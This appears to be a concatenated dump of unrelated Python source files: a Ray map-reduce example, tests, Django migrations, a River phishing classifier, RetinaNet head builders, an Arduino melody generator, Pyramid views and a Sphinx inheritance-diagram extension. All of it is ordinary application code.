self.word_counts.append(Counter(article.split(" ")))
self.num_articles_processed += 1
def get_range(self, article_index, keys):
# Process more articles if this Mapper hasn't processed enough yet.
while self.num_articles_processed < article_index + 1:
self.get_new_article()
# Return the word counts from within a given character range.
return [(k, v) for k, v in self.word_counts[article_index].items()
if len(k) >= 1 and k[0] >= keys[0] and k[0] <= keys[1]]
@ray.remote
class Reducer(object):
def __init__(self, keys, *mappers):
self.mappers = mappers
self.keys = keys
def next_reduce_result(self, article_index):
word_count_sum = defaultdict(lambda: 0)
# Get the word counts for this Reducer's keys from all of the Mappers
# and aggregate the results.
count_ids = [mapper.get_range.remote(article_index, self.keys)
for mapper in self.mappers]
# TODO(rkn): We should process these out of order using ray.wait.
for count_id in count_ids:
for k, v in ray.get(count_id):
word_count_sum[k] += v
return word_count_sum
class Stream(object):
def __init__(self, elements):
self.elements = elements
def next(self):
i = np.random.randint(0, len(self.elements))
return self.elements[i]
if __name__ == "__main__":
args = parser.parse_args()
ray.init()
# Create one streaming source of articles per mapper.
directory = os.path.dirname(os.path.realpath(__file__))
streams = []
for _ in range(args.num_mappers):
with open(os.path.join(directory, "articles.txt")) as f:
streams.append(Stream([line.strip() for line in f.readlines()]))
# Partition the keys among the reducers.
chunks = np.array_split([chr(i) for i in range(ord("a"), ord("z") + 1)],
args.num_reducers)
keys = [[chunk[0], chunk[-1]] for chunk in chunks]
# Create a number of mappers.
mappers = [Mapper.remote(stream) for stream in streams]
# Create a number of reduces, each responsible for a different range of
# keys. This gives each Reducer actor a handle to each Mapper actor.
reducers = [Reducer.remote(key, *mappers) for key in keys]
article_index = 0
while True:
print("article index = {}".format(article_index))
wordcounts = {}
counts = ray.get([reducer.next_reduce_result.remote(article_index)
for reducer in reducers])
for count in counts:
wordcounts.update(count)
most_frequent_words = heapq.nlargest(10, wordcounts,
key=wordcounts.get)
for word in most_frequent_words:
print(" ", word, wordcounts[word])
article_index += 1
|
py | b4153b65d8b82a7b1333e1be7c00b9212d64ebdd | from copy import deepcopy
from mock import patch
from requests_oauthlib import OAuth2Session
from api_buddy.network.auth.oauth2 import get_oauth2_session, APPLICATION_JSON
from tests.helpers import (
TEST_PREFERENCES,
TEST_OPTIONS,
TEMP_FILE,
TempYAMLTestCase,
mock_get,
)
class TestGetOauthSession(TempYAMLTestCase):
@mock_get()
@patch('requests.get')
def test_returns_a_session(self, mock_get):
sesh = get_oauth2_session(
TEST_OPTIONS,
deepcopy(TEST_PREFERENCES),
TEMP_FILE,
)
assert type(sesh) == OAuth2Session
@mock_get()
@patch('requests.get')
def test_adds_headers(self, mock_get):
sesh = get_oauth2_session(
TEST_OPTIONS,
deepcopy(TEST_PREFERENCES),
TEMP_FILE,
)
headers = sesh.headers
assert headers['Accept'] == APPLICATION_JSON
assert headers['Content-Type'] == APPLICATION_JSON
|
py | b4153e7d5a2cf5c439d69ed6873d5a48a161caed | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import markupfield.fields
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('companies', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Sponsor',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now, blank=True)),
('updated', models.DateTimeField(blank=True)),
('content', markupfield.fields.MarkupField(rendered_field=True, blank=True)),
('content_markup_type', models.CharField(max_length=30, choices=[('', '--'), ('html', 'html'), ('plain', 'plain'), ('markdown', 'markdown'), ('restructuredtext', 'restructuredtext')], default='restructuredtext', blank=True)),
('is_published', models.BooleanField(db_index=True, default=False)),
('featured', models.BooleanField(help_text='Check to include Sponsor in feature rotation', db_index=True, default=False)),
('_content_rendered', models.TextField(editable=False)),
('company', models.ForeignKey(to='companies.Company')),
('creator', models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, related_name='sponsors_sponsor_creator', blank=True)),
('last_modified_by', models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, related_name='sponsors_sponsor_modified', blank=True)),
],
options={
'verbose_name': 'sponsor',
'verbose_name_plural': 'sponsors',
},
bases=(models.Model,),
),
]
|
py | b4153e7dc22282585d024cbc5a286b175fe3948e | from river import compose
from river import preprocessing
from river import linear_model
from river import metrics
from river import datasets
from river import optim
optimizer = optim.SGD(0.1)
model = compose.Pipeline(
preprocessing.StandardScaler(),
linear_model.LogisticRegression(optimizer)
)
metric = metrics.ROCAUC()
precision = metrics.Precision()
for x, y in datasets.Phishing():
y_pred = model.predict_proba_one(x)
model.learn_one(x, y)
metric.update(y, y_pred)
precision.update(y, y_pred)
print(metric)
print(precision)
|
py | b4153ede269ab6ad470e107b72d853ed2ffd8c41 | class NamedExplodingObject(object):
"""An object which has no attributes but produces a more informative
error message when accessed.
Parameters
----------
name : str
The name of the object. This will appear in the error messages.
Notes
-----
One common use for this object is so ensure that an attribute always exists
even if sometimes it should not be used.
"""
def __init__(self, name, extra_message=None):
self._name = name
self._extra_message = extra_message
def __getattr__(self, attr):
extra_message = self._extra_message
raise AttributeError(
'attempted to access attribute %r of ExplodingObject %r%s' % (
attr,
self._name,
),
' ' + extra_message if extra_message is not None else '',
)
def __repr__(self):
return '%s(%r%s)' % (
type(self).__name__,
self._name,
# show that there is an extra message but truncate it to be
# more readable when debugging
', extra_message=...' if self._extra_message is not None else '',
)
|
py | b4153f6b7b9e362e90aee5b2f1ec0083e8fa0e17 | # Generated by Django 2.2.1 on 2019-06-13 09:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0033_auto_20190604_1242'),
]
operations = [
migrations.AlterField(
model_name='account',
name='internet_nl_api_password',
field=models.TextField(blank=True, help_text='New values will automatically be encrypted.', null=True),
),
]
|
py | b4153ffafb41099f951afdc540259b1454c0ab31 | import numpy as np
import tensorflow as tf
from retinanet.model.head.detection_head import DetectionHead
def build_detection_heads(
params,
min_level,
max_level,
conv_2d_op_params=None,
normalization_op_params=None,
activation_fn=None):
if activation_fn is None:
raise ValueError('`activation_fn` cannot be None')
box_head = DetectionHead(
num_convs=params.num_convs,
filters=params.filters,
output_filters=params.num_anchors * 4,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer='zeros',
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='box-head')
prior_prob_init = tf.constant_initializer(-np.log((1 - 0.01) / 0.01))
class_head = DetectionHead(
num_convs=params.num_convs,
filters=params.filters,
output_filters=params.num_anchors*params.num_classes,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer=prior_prob_init,
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='class-head')
return box_head, class_head
def build_auxillary_head(
num_convs,
filters,
num_anchors,
min_level,
max_level,
conv_2d_op_params=None,
normalization_op_params=None,
activation_fn=None):
if activation_fn is None:
raise ValueError('`activation_fn` cannot be None')
prior_prob_init = tf.constant_initializer(-np.log((1 - 0.5) / 0.5))
auxillary_head = DetectionHead(
num_convs=num_convs,
filters=filters,
output_filters=num_anchors,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer=prior_prob_init,
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='auxillary-head')
return auxillary_head
|
py | b415400f36c9bb90f8d3262297b5cfdbf462fc83 | from music import millis, herz
fout = open("music.txt", "w")
def tone(pin, frequency, duration):
d = millis(duration)
dH = d // 256
dL = d % 256
print(hex(dH), hex(dL), hex(herz(frequency)), sep=',', end=',', file=fout)
def delay(duration):
d = millis(duration)
dH = d // 256
dL = d % 256
print(hex(dH), hex(dL), hex(0), sep=',', end=',', file=fout)
tonePin = 11;
tone(tonePin, 1244, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1244, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1864, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 234.37490625);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 234.37490625);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1864, 234.37490625);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 234.37490625);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 156.2499375);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 234.37490625);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 246, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 207, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1864, 234.37490625);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 246, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 369, 78.12496875);
delay(86.8055208333);
tone(tonePin, 155, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 77, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 155, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 65, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 369, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 123, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 116, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
fout.close()
|
py | b41540b5d4282a93e8a997b431dbae3201b09eb4 | from pyramid.httpexceptions import HTTPBadRequest, HTTPForbidden, HTTPOk, HTTPNotFound
from pyramid.response import Response
from pyramid.view import view_config
from .models import DBSession, Colleague, Colleaguetriage
from .models_helpers import ModelsHelper
import transaction
import logging
import json
log = logging.getLogger(__name__)
models_helper = ModelsHelper()
# @view_config(route_name='colleague_create', renderer='json', request_method='POST')
# def colleague_triage_new_colleague(request):
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# ct = Colleaguetriage(triage_type='New', json=json.dumps(colleague_data), colleague_id=None, created_by="OTTO")
# DBSession.add(ct)
# transaction.commit()
# return {'sucess': True}
# @view_config(route_name='colleague_update', renderer='json', request_method='PUT')
# def colleague_triage_update_colleague(request):
# format_name = request.matchdict['format_name']
# if format_name is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No format name provided'}))
# colleague = DBSession.query(Colleague).filter(Colleague.format_name == format_name).one_or_none()
# if colleague:
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# ct = Colleaguetriage(triage_type='Update', colleague_data=json.dumps(colleague_data), colleague_id=int(colleague.colleague_id), created_by="OTTO")
# DBSession.add(ct)
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague not found'}))
# return {'sucess': True}
# @view_config(route_name='colleague_triage_accept', renderer='json', request_method='POST')
# def colleague_triage_accept(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == triage_id).one_or_none()
# if triage:
# triage.apply_to_colleague()
# # triage.delete()
# # transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
# return {'success': True}
# @view_config(route_name='colleague_triage_update', renderer='json', request_method='PUT')
# def colleague_triage_update(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == id).one_or_none()
# if triage:
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# triage.colleague_data = json.dumps(colleague_data)
# DBSession.add(triage)
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
# return {'success': True}
# @view_config(route_name='colleague_triage_delete', renderer='json', request_method='DELETE')
# def colleague_triage_delete(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == id).one_or_none()
# if triage:
# triage.delete()
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
@view_config(route_name='colleague_get', renderer='json', request_method='GET')
def colleague_by_format_name(request):
try:
format_name = request.matchdict['format_name']
colleague = DBSession.query(Colleague).filter(
Colleague.format_name == format_name).one_or_none()
if colleague is not None:
# if colleague.is_in_triage:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague not found, pending review due to recent submission update. is in triage: '}))
result = colleague.to_simple_dict()
return result
elif colleague is None:
return {}
else:
return HTTPNotFound(body=json.dumps(
{}))
except Exception as e:
return HTTPNotFound(body=json.dumps({'error': str(e)}))
|
py | b41540ded1cbe81d97cecc430ff1dfab3a9d5f71 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
"""
Defines a docutils directive for inserting inheritance diagrams.
Provide the directive with one or more classes or modules (separated
by whitespace). For modules, all of the classes in that module will
be used.
Example::
Given the following classes:
class A: pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(B): pass
.. inheritance-diagram: D E
Produces a graph like the following:
A
/ \
B C
/ \ /
E D
The graph is inserted as a PNG+image map into HTML and a PDF in
LaTeX.
"""
import inspect
import os
import re
import subprocess
try:
from hashlib import md5
except ImportError:
from md5 import md5
from docutils.nodes import Body, Element
from docutils.parsers.rst import directives
from sphinx.roles import xfileref_role
def my_import(name):
"""Module importer - taken from the python documentation.
This function allows importing names with dots in them."""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class DotException(Exception):
pass
class InheritanceGraph(object):
"""
Given a list of classes, determines the set of classes that
they inherit from all the way to the root "object", and then
is able to generate a graphviz dot graph from them.
"""
def __init__(self, class_names, show_builtins=False):
"""
*class_names* is a list of child classes to show bases from.
If *show_builtins* is True, then Python builtins will be shown
in the graph.
"""
self.class_names = class_names
self.classes = self._import_classes(class_names)
self.all_classes = self._all_classes(self.classes)
if len(self.all_classes) == 0:
raise ValueError("No classes found for inheritance diagram")
self.show_builtins = show_builtins
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* $ # optionally arguments
''', re.VERBOSE)
def _import_class_or_module(self, name):
"""
Import a class using its fully-qualified *name*.
"""
try:
path, base = self.py_sig_re.match(name).groups()
except:
raise ValueError(
"Invalid class or module '%s' specified for inheritance diagram" % name)
fullname = (path or '') + base
path = (path and path.rstrip('.'))
if not path:
path = base
try:
module = __import__(path, None, None, [])
# We must do an import of the fully qualified name. Otherwise if a
# subpackage 'a.b' is requested where 'import a' does NOT provide
# 'a.b' automatically, then 'a.b' will not be found below. This
# second call will force the equivalent of 'import a.b' to happen
# after the top-level import above.
my_import(fullname)
except ImportError:
raise ValueError(
"Could not import class or module '%s' specified for inheritance diagram" % name)
try:
todoc = module
for comp in fullname.split('.')[1:]:
todoc = getattr(todoc, comp)
except AttributeError:
raise ValueError(
"Could not find class or module '%s' specified for inheritance diagram" % name)
# If a class, just return it
if inspect.isclass(todoc):
return [todoc]
elif inspect.ismodule(todoc):
classes = []
for cls in todoc.__dict__.values():
if inspect.isclass(cls) and cls.__module__ == todoc.__name__:
classes.append(cls)
return classes
raise ValueError(
"'%s' does not resolve to a class or module" % name)
def _import_classes(self, class_names):
"""
Import a list of classes.
"""
classes = []
for name in class_names:
classes.extend(self._import_class_or_module(name))
return classes
def _all_classes(self, classes):
"""
Return a list of all classes that are ancestors of *classes*.
"""
all_classes = {}
def recurse(cls):
all_classes[cls] = None
for c in cls.__bases__:
if c not in all_classes:
recurse(c)
for cls in classes:
recurse(cls)
return all_classes.keys()
def class_name(self, cls, parts=0):
"""
Given a class object, return a fully-qualified name. This
works for things I've tested in matplotlib so far, but may not
be completely general.
"""
module = cls.__module__
if module == '__builtin__':
fullname = cls.__name__
else:
fullname = "%s.%s" % (module, cls.__name__)
if parts == 0:
return fullname
name_parts = fullname.split('.')
return '.'.join(name_parts[-parts:])
def get_all_class_names(self):
"""
Get all of the class names involved in the graph.
"""
return [self.class_name(x) for x in self.all_classes]
# These are the default options for graphviz
default_graph_options = {
"rankdir": "LR",
"size": '"8.0, 12.0"'
}
default_node_options = {
"shape": "box",
"fontsize": 10,
"height": 0.25,
"fontname": "Vera Sans, DejaVu Sans, Liberation Sans, Arial, Helvetica, sans",
"style": '"setlinewidth(0.5)"'
}
default_edge_options = {
"arrowsize": 0.5,
"style": '"setlinewidth(0.5)"'
}
def _format_node_options(self, options):
return ','.join(["%s=%s" % x for x in options.items()])
def _format_graph_options(self, options):
return ''.join(["%s=%s;\n" % x for x in options.items()])
def generate_dot(self, fd, name, parts=0, urls={},
graph_options={}, node_options={},
edge_options={}):
"""
Generate a graphviz dot graph from the classes that
were passed in to __init__.
*fd* is a Python file-like object to write to.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
*graph_options*, *node_options*, *edge_options* are
dictionaries containing key/value pairs to pass on as graphviz
properties.
"""
g_options = self.default_graph_options.copy()
g_options.update(graph_options)
n_options = self.default_node_options.copy()
n_options.update(node_options)
e_options = self.default_edge_options.copy()
e_options.update(edge_options)
fd.write('digraph %s {\n' % name)
fd.write(self._format_graph_options(g_options))
for cls in self.all_classes:
if not self.show_builtins and cls in __builtins__.values():
continue
name = self.class_name(cls, parts)
# Write the node
this_node_options = n_options.copy()
url = urls.get(self.class_name(cls))
if url is not None:
this_node_options['URL'] = '"%s"' % url
fd.write(' "%s" [%s];\n' %
(name, self._format_node_options(this_node_options)))
# Write the edges
for base in cls.__bases__:
if not self.show_builtins and base in __builtins__.values():
continue
base_name = self.class_name(base, parts)
fd.write(' "%s" -> "%s" [%s];\n' %
(base_name, name,
self._format_node_options(e_options)))
fd.write('}\n')
def run_dot(self, args, name, parts=0, urls={},
graph_options={}, node_options={}, edge_options={}):
"""
Run graphviz 'dot' over this graph, returning whatever 'dot'
writes to stdout.
*args* will be passed along as commandline arguments.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
Raises DotException for any of the many os and
installation-related errors that may occur.
"""
try:
dot = subprocess.Popen(['dot'] + list(args),
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=True)
except OSError:
raise DotException("Could not execute 'dot'. Are you sure you have 'graphviz' installed?")
except ValueError:
raise DotException("'dot' called with invalid arguments")
except:
raise DotException("Unexpected error calling 'dot'")
self.generate_dot(dot.stdin, name, parts, urls, graph_options,
node_options, edge_options)
dot.stdin.close()
result = dot.stdout.read()
returncode = dot.wait()
if returncode != 0:
raise DotException("'dot' returned the errorcode %d" % returncode)
return result
class inheritance_diagram(Body, Element):
"""
A docutils node to use as a placeholder for the inheritance
diagram.
"""
pass
def inheritance_diagram_directive(name, arguments, options, content, lineno,
content_offset, block_text, state,
state_machine):
"""
Run when the inheritance_diagram directive is first encountered.
"""
node = inheritance_diagram()
class_names = arguments
# Create a graph starting with the list of classes
graph = InheritanceGraph(class_names)
# Create xref nodes for each target of the graph's image map and
# add them to the doc tree so that Sphinx can resolve the
# references to real URLs later. These nodes will eventually be
# removed from the doctree after we're done with them.
for name in graph.get_all_class_names():
refnodes, x = xfileref_role(
'class', ':class:`%s`' % name, name, 0, state)
node.extend(refnodes)
# Store the graph object so we can use it to generate the
# dot file later
node['graph'] = graph
# Store the original content for use as a hash
node['parts'] = options.get('parts', 0)
node['content'] = " ".join(class_names)
return [node]
def get_graph_hash(node):
return md5(node['content'] + str(node['parts'])).hexdigest()[-10:]
def html_output_graph(self, node):
"""
Output the graph for HTML. This will insert a PNG with clickable
image map.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
path = '_images'
dest_path = os.path.join(setup.app.builder.outdir, path)
if not os.path.exists(dest_path):
os.makedirs(dest_path)
png_path = os.path.join(dest_path, name + ".png")
path = setup.app.builder.imgpath
# Create a mapping from fully-qualified class names to URLs.
urls = {}
for child in node:
if child.get('refuri') is not None:
urls[child['reftitle']] = child.get('refuri')
elif child.get('refid') is not None:
urls[child['reftitle']] = '#' + child.get('refid')
# These arguments to dot will save a PNG file to disk and write
# an HTML image map to stdout.
image_map = graph.run_dot(['-Tpng', '-o%s' % png_path, '-Tcmapx'],
name, parts, urls)
return ('<img src="%s/%s.png" usemap="#%s" class="inheritance"/>%s' %
(path, name, name, image_map))
def latex_output_graph(self, node):
"""
Output the graph for LaTeX. This will insert a PDF.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
dest_path = os.path.abspath(os.path.join(setup.app.builder.outdir, '_images'))
if not os.path.exists(dest_path):
os.makedirs(dest_path)
pdf_path = os.path.abspath(os.path.join(dest_path, name + ".pdf"))
graph.run_dot(['-Tpdf', '-o%s' % pdf_path],
name, parts, graph_options={'size': '"6.0,6.0"'})
return '\n\\includegraphics{%s}\n\n' % pdf_path
def visit_inheritance_diagram(inner_func):
"""
This is just a wrapper around html/latex_output_graph to make it
easier to handle errors and insert warnings.
"""
def visitor(self, node):
try:
content = inner_func(self, node)
except DotException, e:
# Insert the exception as a warning in the document
warning = self.document.reporter.warning(str(e), line=node.line)
warning.parent = node
node.children = [warning]
else:
source = self.document.attributes['source']
self.body.append(content)
node.children = []
return visitor
def do_nothing(self, node):
pass
def setup(app):
setup.app = app
setup.confdir = app.confdir
app.add_node(
inheritance_diagram,
latex=(visit_inheritance_diagram(latex_output_graph), do_nothing),
html=(visit_inheritance_diagram(html_output_graph), do_nothing))
app.add_directive(
'inheritance-diagram', inheritance_diagram_directive,
False, (1, 100, 0), parts = directives.nonnegative_int)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.